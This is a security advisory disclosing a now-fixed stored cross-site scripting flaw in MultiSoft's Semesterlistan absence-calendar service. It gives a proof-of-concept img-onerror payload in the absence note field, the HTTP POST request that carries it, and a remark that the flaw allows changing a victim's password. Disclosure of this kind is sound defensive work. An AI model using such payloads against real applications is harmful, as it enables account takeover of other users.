MultiNet Semesterlistan Persistent Cross-Site Scripting
This disclosure does not have a CVE assigned to it as it affects a cloud service.
Summary
Semesterlistan (en. AbsenceList) allows users to add a note to their absence periods, but does not properly sanitise this field in the main calendar view. This allows an authenticated low-privilege user to inject arbitrary JavaScript to affect all users (including managers able to approve absence) when they open the application.
Vendor Description
MultiSoft is a Swedish software company that helps businesses save resources to concentrate on creating and adding value with automated and bespoke system solutions.
Source: https://www.multisoft.se/en/about-multisoft/
Remediation
MultiSoft has remediated this issue; no action is required for cloud users.
Technical Details
Log on as any low-privileged user and opt to add a new absence period such as vacation.
Select today’s date and enter the following payload as the absence note:
<img src=a onerror="alert('Cross-Site Scripting at: '+document.domain)">
The following HTTP POST request is sent when the absence is submitted:
POST /api/Period/Create HTTP/1.1
Host: app.semesterlistan.se
...
{"Period":{"startDate":"2022-03-29T22:00:00.000Z","endDate":"2022-03-30T21:59:00.000Z","periodNote":"<img src=a onerror=\"alert('Cross-Site Scripting at: '+document.domain)\">","periodTypeId":1,"userId":<REMOVED>,"StartDate":"2022-03-30 00:00:00+02:00","EndDate":"2022-03-30 23:59:00+02:00"}}
Submit the absence request and note how the injected JavaScript triggers when the calendar view is reloaded.
It is notable that the attack vector can be used to change a victim’s password, as the current password is not required.
CVSS v3.1
HIGH, 8.2 - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:H/A:L
Vulnerability Disclosure Timeline
2022-03-30 - Disclosed to vendor
2022-03-31 - Vendor confirms vulnerability stating it is resolved
2022-03-31 - Informs vendor that the issue is still present ( no response )
2022-04-06 - Vendor contacted ( no response )
2022-04-08 - The issue appears to be fixed
2022-04-12 - Vendor confirms fix
2022-08-21 - Public disclosure